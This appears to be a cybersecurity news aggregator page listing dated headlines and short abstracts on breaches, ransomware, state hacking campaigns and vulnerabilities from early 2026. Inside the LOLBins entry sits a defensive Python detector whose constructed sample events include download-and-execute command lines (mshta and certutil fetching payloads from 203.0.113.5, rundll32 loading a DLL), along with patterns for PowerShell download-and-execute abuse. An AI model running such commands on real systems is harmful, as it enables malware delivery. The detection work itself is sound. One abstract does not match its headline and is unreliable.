Welcome to BSafes Library
BSafes library includes mobile-friendly cybersecurity publications.
News
February 26, 2026 – General
Darktrace Flags 32 Million Phishing Emails in 2025 as Identity Attacks
Abstract
The data was collected by Darktrace from incidents across its global customer base and points to a year defined by automation, convergence and accelerating attacker speed. (Infosecurity Magazine)
February 26, 2026 – APT
APT37 Adds New Tools For Air-Gapped Networks
Abstract
ThreatLabz details the Ruby Jumper campaign in the following sections, focusing on the specific malware employed, the deployment methods, and how the final payload is delivered to achieve the ultimate objective. (Zscaler)
February 24, 2026 – Attack
Japanese chip-testing toolmaker Advantest suffers ransomware attack
Abstract
Japanese tech testing company Advantest has suffered a ransomware attack, the company confirmed last Thursday, after detecting unusual activity within its IT environment on February 15, 2026. (Help Net Security)
February 24, 2026 – APT
APT28 Targeted European Entities Using Webhook-Based Macro Malware
Abstract
APT28, a Russia-linked state-sponsored threat actor, has been attributed to a campaign targeting selected entities across Western and Central Europe, active from September 2025 through January 2026, according to S2 Grupo’s LAB52 team. (The Hacker News)
February 24, 2026 – Malware
Malicious OpenClaw Skills Used to Distribute Atomic macOS Stealer
Abstract
Atomic (AMOS) Stealer has evolved from being distributed via cracked software to a more sophisticated supply chain attack that manipulates AI agentic workflows on platforms like OpenClaw. (Trend Micro)
February 23, 2026 – Hacker
MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP
Abstract
The Iranian hacking group known as MuddyWater has targeted several organizations and individuals mainly located across the Middle East and North Africa (MENA) region as part of a new campaign codenamed Operation Olalampo. (The Hacker News)
February 20, 2026 – Vulnerabilities
Critical Vulnerability in Welker OdorEyes EcoSystem Pulse Bypass System
Abstract
A critical vulnerability has been identified in the Welker OdorEyes EcoSystem Pulse Bypass System with XL4 Controller. This vulnerability, which lacks authentication for a critical function, could lead to over- or under-odorization events. (CISA)
February 20, 2026 – Attack
Industrial-Scale Fake Coretax Apps Drive $2m Fraud in Indonesia
Abstract
A fraud campaign exploiting Indonesia's Coretax tax platform has resulted in financial losses of $1.5m to $2m. The operation identified 228 new malware samples and 996 phishing URLs, targeting a potential pool of 67 million Indonesian taxpayers. (Infosecurity Magazine)
February 20, 2026 – Malware
Remcos RAT Expands Real-Time Surveillance Capabilities
Abstract
The Remcos RAT has evolved with new real-time surveillance capabilities and stronger evasion techniques. Originally a legitimate remote management tool, Remcos has been repurposed as a Remote Access Trojan. (Infosecurity Magazine)
February 20, 2026 – Vulnerabilities
Critical Vulnerabilities in Jinan USR IOT Technology Limited (PUSR) USR-W610
Abstract
Multiple critical vulnerabilities have been identified in the Jinan USR IOT Technology Limited (PUSR) USR-W610 device, potentially allowing unauthorized access and denial-of-service attacks. (CISA)
February 20, 2026 – Vulnerabilities
better-auth Flaw Allows Unauthenticated API Key Creation
Abstract
A critical vulnerability in the better-auth library allows unauthenticated attackers to create API keys for arbitrary users, posing a significant risk of account takeover and MFA bypass. (eSecurity Planet)
February 20, 2026 – Malware
Crims hit a $20M jackpot via malware-stuffed ATMs
Abstract
ATM jackpotting is a significant threat, with over $20 million stolen using malware-assisted techniques. The Ploutus malware exploits the XFS API, allowing attackers to dispense cash without bank authorization. (The Register)
February 20, 2026 – General
Researchers warn Volt Typhoon still embedded in US utilities and some breaches may never be found
Abstract
Volt Typhoon continues to target strategically important sites, maintaining long-term access to operational technology networks. This access could enable destructive cyberattacks aimed at slowing U.S. military mobilization. (The Record)
February 19, 2026 – Government
Known Exploited Vulnerabilities Catalog
Abstract
The vulnerability in TeamT5 ThreatSonar Anti-Ransomware allows remote attackers with administrator privileges to upload malicious files, potentially leading to arbitrary command execution on the server. (CISA)
February 19, 2026 – General
China-linked crew embedded in US energy networks
Abstract
The cybersecurity landscape is increasingly threatened by state-sponsored groups, particularly from China and Russia, targeting critical infrastructure in the US. Notably, the Volt Typhoon group has been embedding malware in US energy networks. (The Register)
February 18, 2026 – Phishing
Hackers Abuse ScreenConnect to Hijack PCs via Fake Social Security Emails
Abstract
Hackers are exploiting fake Social Security Administration (SSA) emails to hijack PCs by abusing the ScreenConnect tool. This attack does not rely on new viruses but rather on hijacking existing tools and weakening system defenses. (Hackread)
February 18, 2026 – Botnet
Keenadu the tablet conqueror and the links between major Android botnets
Abstract
Keenadu is a sophisticated backdoor targeting Android devices by embedding itself into the firmware. It mirrors the behavior of the Triada backdoor, allowing attackers to control devices remotely and exfiltrate data.
February 18, 2026 – Attack
SmartLoader Attack Uses Trojanized Oura MCP Server to Deploy StealC Infostealer
Abstract
The SmartLoader campaign involves a sophisticated attack using a trojanized Oura MCP server to deploy the StealC infostealer. Threat actors have invested months in building credibility by creating fake GitHub accounts and repositories. (The Hacker News)
February 18, 2026 – Hacker
Hackers target supporters of Iran protests in new espionage campaign
Abstract
A cyberespionage campaign targets supporters of Iran's anti-government protests, focusing on Farsi-speaking Iranians, activists, and journalists. The campaign exploits the ongoing internet blackout in Iran and is linked to Iranian-aligned hackers. (The Record)
February 12, 2026 – Government
CISA Releases Two Industrial Control Systems Advisories
Abstract
CISA has released two new ICS advisories on December 30, 2025. These advisories address vulnerabilities in WHILL C2 Wheelchairs and AzeoTech DAQFactory, providing critical information on current security issues and exploits. (CISA)
February 12, 2026 – Vulnerabilities
Apple fixes zero-day flaw used in ‘extremely sophisticated’ attacks
Abstract
Apple has addressed a zero-day vulnerability, CVE-2026-20700, in its Dynamic Link Editor (dyld), which was exploited in highly sophisticated attacks targeting specific individuals. This marks the first zero-day fix in 2026. (Bleeping Computer)
February 12, 2026 – Breach
Georgia healthcare company data breach impacts more than 620,000
Abstract
A significant data breach at ApolloMD, a Georgia-based healthcare provider, occurred between May 22 and May 23, 2025, compromising the sensitive information of 626,540 individuals. The breach was executed by the Qilin ransomware gang. (The Record)
February 12, 2026 – Breach
Volvo Group hit in massive Conduent data breach
Abstract
A significant data breach at Conduent has impacted over 25 million individuals, including 17,000 employees of Volvo Group North America. The breach exposed sensitive personal data, making it one of the largest breaches in recent history. (Security Affairs)
February 12, 2026 – Attack
Crazy ransomware gang abuses employee monitoring tool in attacks
Abstract
The Crazy ransomware gang is exploiting legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. (Bleeping Computer)
February 12, 2026 – Malware
First Malicious Outlook Add-In Found Stealing 4,000+ Microsoft Credentials
Abstract
The "AgreeToSteal" attack marks the first known instance of a malicious Microsoft Outlook add-in in the wild, exploiting the abandoned "AgreeTo" add-in to steal over 4,000 Microsoft credentials. (The Hacker News)
February 11, 2026 – Phishing
Pride Month Phishing Targets Employees via Trusted Email Services
Abstract
The phishing campaign began in December 2025, initially targeting 504 organizations primarily in the financial services and consulting sectors as part of a testing phase. (Hackread)
February 11, 2026 – Malware
ZeroDayRAT malware grants full access to Android, iOS devices
Abstract
ZeroDayRAT is a sophisticated mobile spyware platform targeting Android and iOS devices, offering cybercriminals full remote control. It poses significant risks to both individuals and enterprises. (Bleeping Computer)
February 11, 2026 – Attack
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps
Abstract
A cyber incident in Poland's energy sector targeted OT and ICS systems, affecting renewable energy plants, a combined heat and power plant, and a manufacturing company. The attack exploited vulnerable edge devices. (CISA)
February 11, 2026 – Phishing
North Korean hackers targeted crypto exec with fake Zoom meeting, ClickFix scam
Abstract
North Korean hackers, identified as UNC1069, targeted a cryptocurrency executive using a fake Zoom meeting and ClickFix scam. The attack aimed to enable cryptocurrency theft and fuel future social engineering campaigns. (The Record)
February 9, 2026 – Breach
Birmingham mental health authority warns 30,000+ people of data breach that leaked SSNs and medical info
Abstract
The Jefferson Blount St. Claire Mental Health Authority in Birmingham, Alabama, experienced a significant data breach in November 2025, affecting over 30,000 individuals. (Comparitech)
February 9, 2026 – Breach
Flickr emails users about data breach, pins it on 3rd party
Abstract
Flickr, a legacy image-sharing platform, has experienced a data breach affecting its global user base. Operating in 190 countries, Flickr has 35 million active users monthly, including 228,000 in Europe. (The Register)
February 9, 2026 – Phishing
State-backed phishing attacks targeting military officials and journalists on Signal
Abstract
A state-backed hacking group is targeting military officials, journalists, and diplomats in Germany and Europe through phishing attacks on Signal. These attacks aim to gain unauthorized access to accounts by impersonating Signal support. (Help Net Security)
February 9, 2026 – Outage
Payments platform BridgePay confirms ransomware attack behind outage
Abstract
BridgePay, a major U.S. payment gateway, has confirmed a ransomware attack that has caused a significant outage across its services. Initial forensic findings indicate that no payment card data has been compromised. (Bleeping Computer)
February 9, 2026 – Botnet
UK Construction Firm Hit by Prometei Botnet Hiding in Windows Server
Abstract
The Prometei botnet, a Russian-linked threat active since 2016, has been identified in a UK construction firm's Windows Server. Known for mining Monero cryptocurrency, it also excels at stealing passwords and maintaining remote control over systems. (Hackread)
February 6, 2026 – Vulnerabilities
Why a decade-old EnCase driver still works as an EDR killer
Abstract
Attackers are exploiting a decade-old EnCase driver to disable 59 endpoint security products. The driver's certificate, issued on December 15, 2006, allows it to load on modern Windows systems due to Microsoft's backward compatibility policies. (Help Net Security)
February 6, 2026 – Breach
Romanian oil pipeline operator Conpet discloses cyberattack
Abstract
The Qilin ransomware gang, known for targeting high-profile organizations, has claimed responsibility for the cyberattack on Conpet, alleging the theft of nearly 1TB of data, including sensitive documents and financial information. (Bleeping Computer)
February 6, 2026 – Vulnerabilities
Critical Vulnerabilities in Ilevia EVE X1 Server Allow Remote Exploitation
Abstract
The Ilevia EVE X1 Server has been found to contain multiple critical vulnerabilities that could allow attackers to execute arbitrary commands, disclose sensitive information, and escalate privileges. (CISA)
February 6, 2026 – Malware
Technical Analysis of Marco Stealer
Abstract
Marco Stealer is a sophisticated information stealer targeting browser data, cryptocurrency wallets, and sensitive files. It employs advanced anti-analysis techniques and uses AES-256 encryption for secure C2 communication. (Zscaler)
February 6, 2026 – Outage
Italian university La Sapienza goes offline after cyberattack
Abstract
La Sapienza University, Europe's largest by in-campus students, has been hit by a ransomware attack attributed to the pro-Russian group Femwar02. The attack has led to significant disruptions, with IT systems offline and data encrypted. (Bleeping Computer)
February 6, 2026 – Botnet
AISURU/Kimwolf Botnet Launches Record-Setting 31.4 Tbps DDoS Attack
Abstract
The AISURU/Kimwolf botnet has launched a record-setting DDoS attack, peaking at 31.4 Tbps. This attack is part of a significant increase in DDoS activity in 2025, with Cloudflare mitigating over 47.1 million attacks throughout the year. (The Hacker News)
February 6, 2026 – Government
CISA Adds Two Known Exploited Vulnerabilities to Catalog
Abstract
CISA has added two vulnerabilities, CVE-2025-11953 and CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) Catalog. These vulnerabilities are actively exploited and pose significant risks to federal enterprises. (CISA)
February 6, 2026 – Outage
Spain’s Ministry of Science shuts down systems after breach claims
Abstract
Spain's Ministry of Science has partially shut down its IT systems following claims of a cyberattack. The Ministry cited a "technical incident" without confirming the attack. (Bleeping Computer)
February 5, 2026 – Malware
Hugging Face abused to spread thousands of Android malware variants
Abstract
A recent Android malware campaign has been identified, exploiting the Hugging Face platform to distribute thousands of malicious APK variants. The malware is disguised as a security tool named TrustBastion. (Bleeping Computer)
February 5, 2026 – Breach
Notepad++ users take note: It’s time to check if you’re hacked
Abstract
A critical security breach has been identified in the update infrastructure of Notepad++, a widely used text editor for Windows. The breach is attributed to suspected Chinese state hackers. (Ars Technica)
February 5, 2026 – Vulnerabilities
Major vulnerabilities found in Google Looker, putting self-hosted deployments at risk
Abstract
Two critical vulnerabilities, collectively known as "LookOut," have been identified in Google Looker, a business intelligence platform used by over 60,000 organizations globally. (Help Net Security)
February 5, 2026 – Breach
Exposed AWS Credentials Lead to AI-Assisted Cloud Breach in 8 Minutes
Abstract
A recent cloud breach highlights the dangers of exposed AWS credentials and AI-assisted attacks. An attacker gained full admin access to a company's cloud environment in just eight minutes. (Hackread)
February 5, 2026 – Government
CISA warns of five-year-old GitLab flaw exploited in attacks
Abstract
CISA issued a warning regarding a five-year-old GitLab vulnerability that is actively being exploited. CISA has urged all organizations, including those in the private sector, to prioritize securing their devices against these ongoing attacks. (Bleeping Computer)
February 4, 2026 – Breach
Seattle-area neurologist warns 13,500 people of data breach that leaked SSNs, medical info
Abstract
A data breach has occurred at Neurological Associates of Washington, affecting 13,500 individuals. The breach involved the theft of sensitive information, including Social Security numbers and medical records, by the ransomware group DragonForce. (Comparitech)
February 4, 2026 – Government
U.S. CISA adds SolarWinds Web Help Desk, Sangoma FreePBX, and GitLab flaws to its Known Exploited Vulnerabilities catalog
Abstract
CISA has added several critical vulnerabilities to its Known Exploited Vulnerabilities catalog. These vulnerabilities affect SolarWinds Web Help Desk, Sangoma FreePBX, and GitLab, posing significant security risks to affected systems. (Security Affairs)
February 4, 2026 – Vulnerabilities
Foxit Releases Security Updates for PDF Editor Cloud XSS Vulnerabilities
Abstract
Foxit Software has addressed multiple cross-site scripting (XSS) vulnerabilities in Foxit PDF Editor Cloud and Foxit eSign. These vulnerabilities could allow attackers to execute arbitrary JavaScript within a user's browser. (The Cyber Express)
February 4, 2026 – Phishing
Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers
Abstract
Microsoft has identified a growing threat where Python-based infostealers are targeting macOS environments. These attacks exploit cross-platform capabilities and trusted platforms to distribute malware at scale. (The Hacker News)
February 4, 2026 – Phishing
How fake party invitations are being used to install remote access tools
Abstract
A sophisticated social engineering campaign is targeting Windows users in the UK by using fake party invitations to install ScreenConnect, a legitimate remote access tool, for malicious purposes. (Malwarebytes)
February 3, 2026 – APT
Russian hackers exploit recently patched Microsoft Office bug in attacks
Abstract
APT28 is actively exploiting a recently patched vulnerability in Microsoft Office, identified as CVE-2026-21509. This zero-day flaw is being used to target Ukrainian government entities and potentially extends to EU-based organizations. (Bleeping Computer)
February 3, 2026 – Breach
Portland, ME schools warn 12,000+ people of data breach that leaked SSNs, financial and medical info
Abstract
Portland Public Schools in Maine has confirmed a data breach affecting over 12,000 individuals, compromising sensitive personal information. The breach was claimed by the ransomware group RansomHub, known for targeting educational institutions. (Comparitech)
February 3, 2026 – Breach
Colorado clinic warns 65,000+ people of data breach that leaked SSNs, credit cards, and medical info
Abstract
A significant data breach at Alpine Ear, Nose & Throat has compromised the personal information of over 65,000 individuals. The breach, attributed to the ransomware group BianLian, involved the theft of sensitive data. (Comparitech)
February 3, 2026 – Attack
Notepad++ hijacking linked to Chinese Lotus Blossom crew
Abstract
A sophisticated malware campaign leveraging Pulsar RAT has been identified, targeting Windows systems. This campaign employs advanced techniques to evade detection and maintain persistent access, posing a significant threat to affected systems. (The Register)
February 3, 2026 – Breach
Panera Bread breach affected 5.1 Million accounts, HIBP Confirms
Abstract
Panera Bread has confirmed a data breach affecting 5.1 million accounts, significantly fewer than the initially reported 14 million. The breach involved the exposure of contact information, including email addresses and physical addresses. (Security Affairs)
February 2, 2026 – Breach
California tribal clinics warn patients of data breach that leaked SSNs and medical info
Abstract
A data breach has occurred at the MACT Health Board, affecting several clinics in California's Sierra Foothills. The breach, attributed to the ransomware group Rhysida, has compromised sensitive personal and medical information of patients. (Comparitech)
February 2, 2026 – Vulnerabilities
Shadow Directories: A Unique Method to Hijack WordPress Permalinks
Abstract
A new method of hijacking WordPress permalinks involves the creation of shadow directories. This technique allows attackers to inject spam content into search engine results without altering the visible content on the website or its database. (Sucuri)
February 2, 2026 – Vulnerabilities
Privileged File System Vulnerability Present in a SCADA System
Abstract
A vulnerability identified as CVE-2025-0921 has been discovered in the Iconics Suite, a SCADA system used for industrial process control. This vulnerability allows for execution with unnecessary privileges, potentially leading to a DoS condition. (Palo Alto Networks)
February 2, 2026 – Attack
Iran-Linked RedKitten Cyber Campaign Targets Human Rights NGOs and Activists
Abstract
The RedKitten cyber campaign, attributed to a Farsi-speaking threat actor aligned with Iranian state interests, targets NGOs and individuals documenting human rights abuses in Iran. (The Hacker News)
February 2, 2026 – Breach
CrossCurve Bridge Hacked for $3M After Smart Contract Validation Vulnerability Exploited
Abstract
The CrossCurve bridge suffered a cyberattack resulting in a $3 million loss. Attackers exploited a vulnerability in the smart contract infrastructure, specifically a gateway validation bypass within the ReceiverAxelar contract. (The Cyber Express)
January 31, 2026 – Botnet
Aisuru botnet sets new record with 31.4 Tbps DDoS attack
Abstract
The Aisuru botnet has set a new record with a massive DDoS attack, peaking at 31.4 Tbps and 200 million requests per second. This unprecedented attack targeted multiple companies, primarily in the telecommunications sector. (Bleeping Computer)
January 31, 2026 – Attack
Supply chain attack on eScan antivirus: detecting and remediating malicious updates
Abstract
A supply chain attack targeted eScan antivirus software, distributing malware through its update server. The attack involved a malicious file that initiated a multi-stage infection chain. (Securelist)
January 31, 2026 – Breach
ShinyHunters claims it stole 10M records from dating apps
Abstract
ShinyHunters, a notorious extortion group, has claimed responsibility for a data breach affecting Match Group, a company that owns popular dating platforms such as Hinge, Match.com, and OkCupid. The breach reportedly involves over 10 million records. (The Register)
January 31, 2026 – Breach
Researcher’s Notebook: Inside the EmEditor supply chain compromise
Abstract
The EmEditor supply chain compromise involved tampering with Windows Installer (MSI) packages to embed malicious scripts. The attackers used look-alike domains and command-and-control (C2) infrastructure to execute their operations. (ReversingLabs)
January 30, 2026 – Malware
Cyble Research Discovers ShadowHS, an In-Memory Linux Framework for Long-Term Access
Abstract
ShadowHS is an advanced fileless Linux exploitation framework designed for stealthy, in-memory operations. It enables attackers to maintain long-term access to compromised systems without leaving persistent traces. (The Cyber Express)
January 30, 2026 – Breach
Marquis blames ransomware breach on SonicWall cloud backup hack
Abstract
Marquis Software Solutions, a financial services provider, experienced a ransomware attack attributed to a breach of SonicWall's cloud backup service. This incident affected numerous U.S. banks and credit unions. (Bleeping Computer)
January 30, 2026 – Attack
Op Bizarre Bazaar: New LLMjacking Campaign Targets Unprotected Models
Abstract
Operation Bizarre Bazaar is a significant cyberattack campaign targeting AI systems to steal compute power and resell access. The campaign, led by a hacker known as Hecker, involves exploiting unprotected AI models, particularly those using MCP. (Hackread)
January 30, 2026 – Vulnerabilities
Ivanti warns of two EPMM flaws exploited in zero-day attacks
Abstract
Ivanti has disclosed two critical zero-day vulnerabilities in Ivanti EPMM, identified as CVE-2026-1281 and CVE-2026-1340. These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable devices without authentication. (Bleeping Computer)
January 30, 2026 – Vulnerabilities
Security Researcher Finds Exposed Admin Panel for AI Toy
Abstract
A critical security vulnerability was discovered in the Bondu AI toy, where an exposed admin panel allowed unauthorized access to sensitive data, including children's personal information and conversation transcripts. (The Cyber Express)
January 30, 2026 – Ransomware
MongoDB Ransomware Is Still Actively Hitting Exposed Databases
Abstract
MongoDB ransomware continues to be a significant threat, primarily targeting exposed databases due to misconfigurations. Attackers exploit these vulnerabilities by scanning for open MongoDB instances, deleting data, and demanding ransoms. (eSecurity Planet)
January 28, 2026 – Outage
Russian security systems firm Delta hit by cyberattack, services disrupted
Abstract
Delta, a prominent Russian provider of alarm and security systems, has experienced a significant cyberattack, leading to widespread service disruptions. The attack, described as large-scale and coordinated, has affected the company's operations. (The Record)
January 28, 2026 – Government
U.S. CISA adds Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog
Abstract
CISA has added several critical vulnerabilities to its Known Exploited Vulnerabilities catalog. These vulnerabilities affect Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and the Linux Kernel. (Security Affairs)
January 28, 2026 – Vulnerabilities
Pyodide Sandbox Escape Enables Remote Code Execution in Grist-Core
Abstract
A critical vulnerability in Grist-Core's Pyodide WebAssembly sandbox allows remote code execution (RCE) through malicious spreadsheet formulas. This flaw, with a CVSS score of 9.1, has been patched. (Infosecurity Magazine)
January 28, 2026 – Vulnerabilities
Critical sandbox escape flaw found in popular vm2 NodeJS library
Abstract
A critical vulnerability, CVE-2026-22709, has been identified in the vm2 Node.js sandbox library, which allows attackers to escape the sandbox and execute arbitrary code on the host system. (Bleeping Computer)
January 28, 2026 – Breach
Nike investigates data breach after extortion gang leaks files
Abstract
Nike is investigating a potential cybersecurity incident after World Leaks claimed to have stolen and leaked 1.4TB of corporate data, including nearly 190,000 files related to business operations. (Bleeping Computer)
January 28, 2026 – Attack
Experts Detect Pakistan-Linked Cyber Campaigns Aimed at Indian Government Entities
Abstract
Two cyber campaigns, Gopher Strike and Sheet Attack, have been identified targeting Indian government entities. These campaigns are linked to a Pakistan-based threat actor and employ sophisticated techniques to compromise systems and exfiltrate data. (The Hacker News)
January 28, 2026 – Criminals
Cybercriminals and nation-state groups are exploiting a six-month-old WinRAR defect
Abstract
A critical path-traversal vulnerability in WinRAR is being actively exploited by nation-state groups. The vulnerability, disclosed and patched six months ago, continues to be a target for espionage and financially motivated attacks. (CyberScoop)
January 28, 2026 – Phishing
There’s a rash of scam spam coming from a real Microsoft address
Abstract
A recent phishing scam has been identified, exploiting a legitimate Microsoft email address to deliver scam emails. This advisory provides details on the scam's operation and its implications. (Ars Technica)
January 27, 2026 – Vulnerabilities
Emergency Microsoft update fixes in-the-wild Office zero-day
Abstract
Microsoft has released an emergency update to address a critical 0-day bug affecting Microsoft Office 2016–2024 and Microsoft 365 Apps. This bug is actively exploited in the wild and allows attackers to bypass security features. (Security Affairs)
January 27, 2026 – Breach
Cybercriminals say they sold data stolen from US medical manufacturer
Abstract
A significant data breach at Cytek Biosciences, a medical manufacturer based in Fremont, California, has been attributed to the ransomware group Rhysida. This breach has compromised sensitive personal and financial information of 331 individuals. (Comparitech)
January 26, 2026 – Breach
ShinyHunters Leak Alleged Data of Millions From SoundCloud, Crunchbase and Betterment
Abstract
The ShinyHunters hacking group has allegedly leaked millions of user records from SoundCloud, Crunchbase, and Betterment. This breach follows failed extortion attempts and raises concerns about potential links to an Okta vishing campaign. (Hackread)
January 26, 2026 – Vulnerabilities
Critical VMware vCenter Server bug under attack
Abstract
A critical vulnerability, CVE-2024-37079, in VMware vCenter Server is being actively exploited. This vulnerability, an out-of-bounds write flaw in the DCERPC protocol, allows remote code execution. (The Register)
January 26, 2026 – Outage
Researchers say Russian government hackers were behind attempted Poland power outage
Abstract
A massive data breach has exposed 149 million credentials, including those from major platforms such as Facebook, Instagram, and government domains. This breach underscores the ongoing threat posed by infostealing malware. (TechCrunch)
January 26, 2026 – Malware
Malicious AI extensions on VSCode Marketplace steal developer data
Abstract
Two malicious AI-based extensions on the VSCode Marketplace, installed 1.5 million times, exfiltrate developer data to China-based servers. These extensions are part of the 'MaliciousCorgi' campaign. (Bleeping Computer)
January 26, 2026 – Breach
Nike is investigating a possible data breach, after WorldLeaks claims
Abstract
Nike is currently investigating a potential data breach following claims by the WorldLeaks cybercrime group. The group alleges it has accessed and stolen 1.4TB of data from Nike's systems, raising concerns about consumer privacy and data security. (Security Affairs)
January 23, 2026 – Criminals
Crims hit the easy button for IT helpdesk scams
Abstract
The emergence of custom voice-phishing kits on dark web forums has significantly enhanced the ability of cybercriminals to conduct social engineering scams. These kits are being used to target Google, Microsoft, and Okta accounts. (The Register)
January 23, 2026 – Ransomware
INC ransomware opsec fail allowed data recovery for 12 US orgs
Abstract
An operational security failure by INC ransomware allowed researchers to recover data stolen from 12 US orgs. A forensic investigation revealed the use of the Restic backup tool and exposed attacker infrastructure. (Bleeping Computer)
January 23, 2026 – Phishing
Phishing attacks abuse SharePoint, target energy orgs
Abstract
A sophisticated phishing campaign has been identified targeting energy-sector organizations. Attackers are exploiting Microsoft SharePoint services to harvest credentials and take over corporate email accounts, leading to widespread phishing attacks. (The Register)
January 23, 2026 – Government
CISA Adds Four Known Exploited Vulnerabilities to Catalog
Abstract
CISA has added four new vulnerabilities to its KEV Catalog. These vulnerabilities include improper access control, improper authentication, embedded malicious code, and remote file inclusion, affecting various software products. (CISA)
January 22, 2026 – Vulnerabilities
Fortinet admins report patched FortiGate firewalls getting hacked Full Text
Abstract
Fortinet's FortiGate firewalls are under attack due to a critical authentication bypass vulnerability that remains exploitable despite previous patch attempts. Attackers are leveraging this flaw to gain unauthorized access to systems.Bleeping Computer
January 22, 2026 – Breach
Hackers exploit security testing apps to breach Fortune 500 firms Full Text
Abstract
Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing to breach cloud environments of Fortune 500 companies.Bleeping Computer
January 22, 2026 – Attack
PurpleBravo’s Targeting of the IT Software Supply Chain Full Text
Abstract
PurpleBravo, a North Korean state-sponsored threat group, poses a significant threat to the IT software supply chain. The group targets software developers, particularly those in the cryptocurrency sector and the wider software development industry.Recorded Future
January 22, 2026 – Attack
Can you use too many LOLBins to drop some RATs? Full Text
Abstract
This advisory details a sophisticated attack leveraging Windows' built-in utilities, known as LOLBins (Living Off the Land Binaries), to deploy Remcos and NetSupport Manager, both of which are remote access tools often abused by cybercriminals.Malwarebytes
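Added example, not code or data from the Malwarebytes advisory: a small detector that scores constructed process-creation events for download-and-execute abuse of commonly misused Windows binaries (mshta, certutil, rundll32, regsvr32, bitsadmin, powershell) and raises an alert when several such events cluster on one host inside a short window. The log lines, hosts, IP addresses and indicator patterns below are constructed assumptions for illustration; the specific chain used in the campaign is not reproduced here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon-style fields):
# (timestamp, host, parent image, child image, command line). Not from the advisory.
SAMPLE_EVENTS = [
    ("2026-01-22T10:01:02", "ws01",
     r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\mshta.exe",
     "mshta.exe http://203.0.113.5/stage1.hta"),
    ("2026-01-22T10:01:05", "ws01",
     r"C:\Windows\System32\mshta.exe",
     r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.5/r.txt C:\\Users\\Public\\r.txt"),
    ("2026-01-22T10:01:09", "ws01",
     r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\Public\r.dll,Start"),
    # Benign admin use of certutil on another host: should not alert.
    ("2026-01-22T10:30:00", "ws02",
     r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\certutil.exe",
     "certutil.exe -hashfile C:\\tools\\setup.msi SHA256"),
]

# Commonly abused LOLBins and command-line patterns that point to
# download/decode/execute abuse rather than routine administrative use.
SUSPICIOUS = {
    "mshta.exe": [re.compile(r"https?://", re.I), re.compile(r"vbscript:|javascript:", re.I)],
    "certutil.exe": [re.compile(r"-urlcache", re.I), re.compile(r"-decode\b", re.I)],
    "rundll32.exe": [re.compile(r"\\users\\public\\|\\appdata\\|\\temp\\", re.I)],
    "regsvr32.exe": [re.compile(r"/i:https?://|scrobj\.dll", re.I)],
    "bitsadmin.exe": [re.compile(r"/transfer", re.I)],
    "powershell.exe": [re.compile(r"-enc(odedcommand)?\b|downloadstring|\biex\b", re.I)],
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def score_event(parent, image, cmdline):
    """Score one event: +2 per suspicious command-line pattern for a known
    LOLBin, +3 if an Office application is the parent. Returns (score, reasons)."""
    name = image.rsplit("\\", 1)[-1].lower()
    score, reasons = 0, []
    for pat in SUSPICIOUS.get(name, []):
        if pat.search(cmdline):
            score += 2
            reasons.append(f"{name}: matches {pat.pattern!r}")
    pname = parent.rsplit("\\", 1)[-1].lower()
    if name in SUSPICIOUS and pname in OFFICE_PARENTS:
        score += 3
        reasons.append(f"{name} spawned by Office process {pname}")
    return score, reasons


def detect_chains(events, window_s=60, threshold=4):
    """Group scored events per host and alert when the summed score of events
    within `window_s` seconds reaches `threshold`. Single benign-looking uses
    stay below the bar; a chained LOLBin sequence crosses it."""
    by_host = defaultdict(list)
    for ts, host, parent, image, cmdline in events:
        score, reasons = score_event(parent, image, cmdline)
        if score:
            by_host[host].append((datetime.fromisoformat(ts), score, reasons))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _, _) in enumerate(hits):
            window = [h for h in hits[i:] if h[0] - t0 <= timedelta(seconds=window_s)]
            total = sum(h[1] for h in window)
            if total >= threshold:
                alerts[host] = {"score": total,
                                "reasons": [r for h in window for r in h[2]]}
                break
    return alerts


if __name__ == "__main__":
    for host, alert in detect_chains(SAMPLE_EVENTS).items():
        print(f"[ALERT] {host} score={alert['score']}")
        for reason in alert["reasons"]:
            print("   -", reason)
```

The scoring is deliberately coarse: the point is that individual LOLBin executions are noisy, so the alert keys on the combination of an Office parent, a network-fetching command line and a payload path under a user-writable directory within one short window.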
January 22, 2026 – Vulnerabilities
Cisco fixed actively exploited Unified Communications zero day Full Text
Abstract
Cisco has addressed a critical zero-day vulnerability, CVE-2026-20045, in its Unified Communications products. This flaw allows unauthenticated remote attackers to execute arbitrary commands on affected devices.Security Affairs
January 22, 2026 – Malware
New Android malware uses AI to click on hidden browser ads Full Text
Abstract
A new family of Android click-fraud trojans is leveraging TensorFlow machine learning models to interact with advertisement elements. This malware is distributed through Xiaomi's GetApps store and third-party APK sites.Bleeping Computer
January 21, 2026 – Vulnerabilities
Anthropic quietly fixed flaws in its Git MCP server Full Text
Abstract
Anthropic has addressed critical vulnerabilities in its Git MCP server that could allow remote code execution. These vulnerabilities, identified as CVE-2025-68145, CVE-2025-68143, and CVE-2025-68144, have been fixed in the latest update.The Register
January 21, 2026 – Vulnerabilities
AI framework flaws put enterprise clouds at risk of takeover Full Text
Abstract
Two critical vulnerabilities in the Chainlit AI framework, CVE-2026-22218 and CVE-2026-22219, pose significant risks to enterprise cloud environments. These vulnerabilities could lead to data leaks or full system takeovers.The Register
January 21, 2026 – Vulnerabilities
Vulnerabilities in Rockwell Automation Verve Asset Manager Allow Unauthorized Access to Sensitive Information Full Text
Abstract
Rockwell Automation's Verve Asset Manager has been found to have vulnerabilities that could allow attackers to access sensitive information. These bugs, identified as CVE-2025-14376 and CVE-2025-14377, affect multiple versions of the product.CISA
January 21, 2026 – Attack
